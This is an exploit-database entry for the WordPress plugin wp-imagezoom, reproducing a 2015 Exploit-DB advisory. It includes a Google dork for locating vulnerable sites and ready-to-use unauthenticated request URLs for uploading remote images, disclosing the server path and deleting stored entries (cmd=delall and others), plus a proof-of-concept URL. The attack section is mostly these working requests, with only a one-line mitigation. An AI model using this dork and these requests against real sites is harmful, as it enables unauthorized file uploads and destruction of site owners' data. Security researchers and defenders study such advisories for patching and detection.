header-logo
Suggest Exploit
vendor:
wp-imagezoom
by:
T3N38R15
6.5
CVSS
MEDIUM
Remote Image Upload
434
CWE
Product Name: wp-imagezoom
Affected Version From: 1.1.2000
Affected Version To: 1.1.2000
Patch Exists: NO
Related CWE: N/A
CPE: a:wordpress:wordpress:1.1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux
2015

wp-imagezoom Remote Image Upload

The affected file is the div_img.php it allowed anybody to upload jpg files. It also support a FPD and we can also delete entry's with http://domain.com/wp-content/plugins/wp-imagezoom/div_img.php?cmd=. Proof of concept is provided.

Mitigation:

Restrict access to the div_img.php file and ensure that only authorized users can upload files.
Source

Exploit-DB raw data:

# Exploit Title: wp-imagezoom Remote Image Upload
# Google Dork: filetype:php inurl:"/wp-content/plugins/wp-imagezoom" & inurl:"?id="
# Date: 06.06.2015
# Exploit Author: T3N38R15
# Software Link: https://downloads.wordpress.org/plugin/wp-imagezoom.1.1.0.zip
# Version: 1.1.0
# Tested on: 	Windows	(Firefox)
		Linux	(Firefox)

The affected file is the div_img.php it allowed anybody to upload jpg files.
/wp-content/plugins/wp-imagezoom/div_img.php?src=http://domain.com/img.jpg&cl=100&dl=100
would upload the file to the default directory :
/wp-content/plugins/wp-imagezoom/work/http_cln__sls__sls_domain.com_sls_img.jpg/
the first one is then your picture ( it is only 469x469 the rest is cut out ), the other are zoomed/cuttet version of it.

it also support a FPD : 
http://domain.com/wp-content/plugins/wp-imagezoom/div_img.php?src=
the variable org_img have the value of the current location to the work directory.

We can also delete entry's with
http://domain.com/wp-content/plugins/wp-imagezoom/div_img.php?cmd=
following options are avaliable for the cmd parameter :
http://domain.com/wp-content/plugins/wp-imagezoom/div_img.php?cmd=delall
http://domain.com/wp-content/plugins/wp-imagezoom/div_img.php?cmd=delunn
http://domain.com/wp-content/plugins/wp-imagezoom/div_img.php?cmd=delone&src=yourwisheddeleted
http://domain.com/wp-content/plugins/wp-imagezoom/div_img.php?cmd=delovr&maxsize=size of image

Proof of concept : http://domain.com/wp-content/plugins/wp-imagezoom/div_img.php?src=http://static.zerochan.net/Frankenstein.(Noblesse).full.415661.jpg&cl=100&dl=100

Greets to Team Madleets/leets.pro & VIRkid ;)
Regards T3N38R15